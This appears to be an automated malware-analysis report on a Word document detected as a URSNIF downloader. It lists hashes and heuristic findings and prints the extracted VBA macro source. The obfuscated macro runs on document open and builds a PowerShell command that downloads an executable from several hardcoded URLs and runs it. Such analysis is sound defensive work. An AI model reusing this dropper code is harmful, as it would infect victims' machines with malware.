Office (OLE) malware analysis — malicious · d722fc2d2b66226a

MALICIOUS

Office (OLE)

67.4 KB Created: 2018-09-05 06:14:00 Authoring application: Microsoft Office Word First seen: 2018-10-09

MD5: f9e43e94386823176a5578e2240dfa1c SHA-1: 98ecfa83ff55f34e4e2b71a8f5c2065d2a34d265 SHA-256: d722fc2d2b66226a8d9f5ed480ed967d3f5eb973efed235d1e51c636664aeebb

182 Risk Score

Heuristics 5

ClamAV: Doc.Downloader.URSNIF-6729855-3 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Downloader.URSNIF-6729855-3
VBA macros detected medium 2 related findings OLE_VBA_MACROS

Document contains VBA macro code
Shell() call in VBA critical OLE_VBA_SHELL

Shell() call in VBA
Document_Open macro high OLE_VBA_DOCOPEN

Document_Open macro
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 5663 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	5663 bytes
SHA-256: `d6206fc53b12a4b00121b98ed958cde8320bb7c976c0e828b3bf19f8dca704cd`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "DfkwlwtEMwwE" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Private Sub Document_open() On _ Error _ Resume _ Next Hour "OtUX" + "FSRYSVzF" Hour "I" + "7534" VBA.Shell CleanString(RLm) + czQnmqAGI + TwLifiZaabUX + lLsCWhXiaBE + ZbfYzzdU + vjViIBPo + jbWrChQjbNQcjk + MJajBDt, 44 - 44 Hour "6036" + "297586013" + "zchCvO" + "3247" Hour "f" + "57412238" Hour "nlMAmIZDnGPdO" + "Q" + "mVzRDz" + "XVPK" Hour "511610628" + "176042789" + "rZ" + "inbzDKLPivDsp" Hour "fXzcWpdhaTr" + "519739690" End Sub Attribute VB_Name = "GjsZiFKkt" Function lLsCWhXiaBE() On _ Error _ Resume _ Next Hour "JRRPimj" + "vak" + "IjSOjAzCCrioY" + "W" Hour "1263" + "tC" + "fO" + "WNFA" aoRpCw = "c" + "md " + "/" + "V" + "^:" + "^O" + "/C" Hour "PEjKTfz" + "nqYs" ErKzGvc = Chr(0 + 4 + 5 + 4 + 21) + "s^e^t" + " ^DW=^ " + "^ ^ " + " ^ " + "^ ^" Hour "mdqb" + "Zf" + "KfO" + "QmOWNGiKi" Hour "NX" + "279969578" + "XHdFDm" + "417881500" SQZcrVnbJ = " ^ ^" + " ^}^}" + "^{hc^t" + "ac^}^;" + "k^a" Hour "WMaw" + "w" Hour "f" + "juFKBtoA" bKqubb = "^" + "e" + "rb;^Mf" + "^j" + "^" + "$^ m^e" + "t^I" + "-eko" + "vnI;)Mf" Hour "ktHsw" + "801" Hour "202377544" + "272655962" Hour "1750" + "280245721" fabwi = "j^$" + "^ ,c^Z" + "^" + "W^$(" + "^el^iF" + "^da^oln" + "wo^" + "D^.Na" + "r${^yrt" + "^{" lLsCWhXiaBE = aoRpCw + ErKzGvc + SQZcrVnbJ + bKqubb + fabwi Hour "aIf" + "ZqlH" + "118570927" + "2530" End Function Function ZbfYzzdU() On _ Error _ Resume _ Next Hour "FlcP" + "NrQB" Hour "5953" + "Pt" + "zBjjwmEi" + "GbwB" Hour "493137409" + "353535048" UPUvLAvQ = ")KU" + "a$^ " + "ni" + " c^ZW^" + "$(^hc^" Hour "zr" + "I" + "PcNwWZSp" + "rjJi" Hour "K" + "8909" Hour "1531" + "1627380" + "8868" + "232810486" TAbSkm = "a^er" + "^" + "of^" + ";" + "'ex" Hour "DQr" + "Ymt" + "zQVAGkEqAZ" + "6440" Hour "zaiHlf" + "XzwXj" + "bHBpbqJP" + "wo" MwNziARLz = "^e" + ".^'^+H^" + "GN^" + "$+" + "'\'+c" + "^" + "i" + "^lb" + "^u^p^:v" + "ne$=^M^" + "fj$^" + ";^'^23" Hour "6072" + "jJM" + "FTRS" + "7933" Hour "lp" + "cq" + "pVFEZR" + "lr" Hour "2557" + "SvIzKiBRs" + "ttCimbVrQGEq" + "tbVGGfWqKD" Hour "VkiTHhaRhdqhKb" + "f" PBJXfkPbCOW = "7'^ ^" + "=^ " + "^H^GN$" + ";)'@" + "'(ti^l" + "^p^" + "S.'VK/m" + "oc.^y" + "r^t" + "n^" + "u^oc^e" + "h^tni" Hour "wH" + "iVU" + "lomHhfdzaBjZcN" + "Woc" Hour "331103102" + "upjR" Hour "9489" + "VAjqAHM" + "Och" + "jswFoOY" Hour "Z" + "IX" Hour "LhlaGZjdlEwGa" + "wi" YXfthG = "n^w" + "o^d//^" + ":^pt^t" + "h@^" + "jeL4^i^" + "L/^ks" + "^.r^ell" + "^im-" Hour "EVjvkbS" + "253529005" Hour "9291" + "BzdB" Hour "A" + "KBs" + "z" + "DrS" Hour "1173" + "lKt" WBVRKj = "^h" + "ca" + "b^hcs" + "^i^f" + "//^" Hour "516948701" + "C" + "9907" + "zh" MSEzRv = ":^p^tth" + "^@^mdw^" + "K^i/m^" + "oc^.tro" + "pnev^ad" + "^e^ir" + "r^ac//:" + "p^t^t" + "^h^@^" + "zjW^dU^" + "U^j^Y/r" Hour "275187219" + "3384" Hour "MRAEvtipU" + "Ip" Hour "N" + "2022" + "ESm" + "nCHa" Hour "460319563" + "Y" + "10468394" + "AhJ" WazbukSc = "^k^.^oc" + "^.^" + "sr^e^p" + "p^oh^" + "d^a" Hour "40" + "kpDmW" Hour "124970469" + "vpmPOivqT" + "iqntKJai" + "UapnzkaqV" Hour "Swr" + "475896889" + "127406398" + "sNVKMSdRjFahc" Hour "6506" + "282338927" Hoqjo = "m//:" + "pt^th^@" + "^p^i^gI" + "/" + "^tn^e^" + "tn^oc-" + "^pw/^k^" + "u." + "^oc.^" + "egar" + "ot" + "^" Hour "5706" + "5953" + "HbbUGCoi" + "raSrKmz" Hour "z" + "9301" + "PScrIIh" + "1636" Hour "9132" + "z" TErSwM = "s" + "nava" + "rac" + "hguo^" + "hdl" + "^" + "oeht//" + ":^pt" + "^t" + "h'^=K^" + "Ua^$" Hour "zKUQ" + "6605" Hour "KhjYaCz" + "296244052" Hour "ohkjdsNpwkLzU" + "385" ZGknf = "^;^tn" + "e^i^lC^" + "b^e^W^." + "^teN^ " + "^tce^j" + "bo^-^w" Hour "ifarzRjQPmGi" + "CoJT" + "82294323" + ... (truncated)

SHA-256: d6206fc53b12a4b00121b98ed958cde8320bb7c976c0e828b3bf19f8dca704cd

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "DfkwlwtEMwwE"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_open()
On _
Error _
Resume _
Next
   Hour "OtUX" + "FSRYSVzF"
   Hour "I" + "7534"
VBA.Shell CleanString(RLm) + czQnmqAGI + TwLifiZaabUX + lLsCWhXiaBE + ZbfYzzdU + vjViIBPo + jbWrChQjbNQcjk + MJajBDt, 44 - 44
   Hour "6036" + "297586013" + "zchCvO" + "3247"
   Hour "f" + "57412238"
   Hour "nlMAmIZDnGPdO" + "Q" + "mVzRDz" + "XVPK"
   Hour "511610628" + "176042789" + "rZ" + "inbzDKLPivDsp"
   Hour "fXzcWpdhaTr" + "519739690"
End Sub



Attribute VB_Name = "GjsZiFKkt"
Function lLsCWhXiaBE()

On _
Error _
Resume _
Next
Hour "JRRPimj" + "vak" + "IjSOjAzCCrioY" + "W"
   Hour "1263" + "tC" + "fO" + "WNFA"
aoRpCw = "c" + "md " + "/" + "V" + "^:" + "^O" + "/C"
Hour "PEjKTfz" + "nqYs"
ErKzGvc = Chr(0 + 4 + 5 + 4 + 21) + "s^e^t" + " ^DW=^ " + "^   ^ " + "  ^ " + "^   ^"
Hour "mdqb" + "Zf" + "KfO" + "QmOWNGiKi"
   Hour "NX" + "279969578" + "XHdFDm" + "417881500"
SQZcrVnbJ = "  ^  ^" + "  ^}^}" + "^{hc^t" + "ac^}^;" + "k^a"
Hour "WMaw" + "w"
   Hour "f" + "juFKBtoA"
bKqubb = "^" + "e" + "rb;^Mf" + "^j" + "^" + "$^ m^e" + "t^I" + "-eko" + "vnI;)Mf"
Hour "ktHsw" + "801"
   Hour "202377544" + "272655962"
   Hour "1750" + "280245721"
fabwi = "j^$" + "^ ,c^Z" + "^" + "W^$(" + "^el^iF" + "^da^oln" + "wo^" + "D^.Na" + "r${^yrt" + "^{"
lLsCWhXiaBE = aoRpCw + ErKzGvc + SQZcrVnbJ + bKqubb + fabwi
   Hour "aIf" + "ZqlH" + "118570927" + "2530"
End Function
Function ZbfYzzdU()

On _
Error _
Resume _
Next
Hour "FlcP" + "NrQB"
   Hour "5953" + "Pt" + "zBjjwmEi" + "GbwB"
   Hour "493137409" + "353535048"
UPUvLAvQ = ")KU" + "a$^ " + "ni" + " c^ZW^" + "$(^hc^"
Hour "zr" + "I" + "PcNwWZSp" + "rjJi"
   Hour "K" + "8909"
   Hour "1531" + "1627380" + "8868" + "232810486"
TAbSkm = "a^er" + "^" + "of^" + ";" + "'ex"
Hour "DQr" + "Ymt" + "zQVAGkEqAZ" + "6440"
   Hour "zaiHlf" + "XzwXj" + "bHBpbqJP" + "wo"
MwNziARLz = "^e" + ".^'^+H^" + "GN^" + "$+" + "'\'+c" + "^" + "i" + "^lb" + "^u^p^:v" + "ne$=^M^" + "fj$^" + ";^'^23"
Hour "6072" + "jJM" + "FTRS" + "7933"
   Hour "lp" + "cq" + "pVFEZR" + "lr"
   Hour "2557" + "SvIzKiBRs" + "ttCimbVrQGEq" + "tbVGGfWqKD"
   Hour "VkiTHhaRhdqhKb" + "f"
PBJXfkPbCOW = "7'^ ^" + "=^ " + "^H^GN$" + ";)'@" + "'(ti^l" + "^p^" + "S.'VK/m" + "oc.^y" + "r^t" + "n^" + "u^oc^e" + "h^tni"
Hour "wH" + "iVU" + "lomHhfdzaBjZcN" + "Woc"
   Hour "331103102" + "upjR"
   Hour "9489" + "VAjqAHM" + "Och" + "jswFoOY"
   Hour "Z" + "IX"
   Hour "LhlaGZjdlEwGa" + "wi"
YXfthG = "n^w" + "o^d//^" + ":^pt^t" + "h@^" + "jeL4^i^" + "L/^ks" + "^.r^ell" + "^im-"
Hour "EVjvkbS" + "253529005"
   Hour "9291" + "BzdB"
   Hour "A" + "KBs" + "z" + "DrS"
   Hour "1173" + "lKt"
WBVRKj = "^h" + "ca" + "b^hcs" + "^i^f" + "//^"
Hour "516948701" + "C" + "9907" + "zh"
MSEzRv = ":^p^tth" + "^@^mdw^" + "K^i/m^" + "oc^.tro" + "pnev^ad" + "^e^ir" + "r^ac//:" + "p^t^t" + "^h^@^" + "zjW^dU^" + "U^j^Y/r"
Hour "275187219" + "3384"
   Hour "MRAEvtipU" + "Ip"
   Hour "N" + "2022" + "ESm" + "nCHa"
   Hour "460319563" + "Y" + "10468394" + "AhJ"
WazbukSc = "^k^.^oc" + "^.^" + "sr^e^p" + "p^oh^" + "d^a"
Hour "40" + "kpDmW"
   Hour "124970469" + "vpmPOivqT" + "iqntKJai" + "UapnzkaqV"
   Hour "Swr" + "475896889" + "127406398" + "sNVKMSdRjFahc"
   Hour "6506" + "282338927"
Hoqjo = "m//:" + "pt^th^@" + "^p^i^gI" + "/" + "^tn^e^" + "tn^oc-" + "^pw/^k^" + "u." + "^oc.^" + "egar" + "ot" + "^"
Hour "5706" + "5953" + "HbbUGCoi" + "raSrKmz"
   Hour "z" + "9301" + "PScrIIh" + "1636"
   Hour "9132" + "z"
TErSwM = "s" + "nava" + "rac" + "hguo^" + "hdl" + "^" + "oeht//" + ":^pt" + "^t" + "h'^=K^" + "Ua^$"
Hour "zKUQ" + "6605"
   Hour "KhjYaCz" + "296244052"
   Hour "ohkjdsNpwkLzU" + "385"
ZGknf = "^;^tn" + "e^i^lC^" + "b^e^W^." + "^teN^ " + "^tce^j" + "bo^-^w"
Hour "ifarzRjQPmGi" + "CoJT" + "82294323" +
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.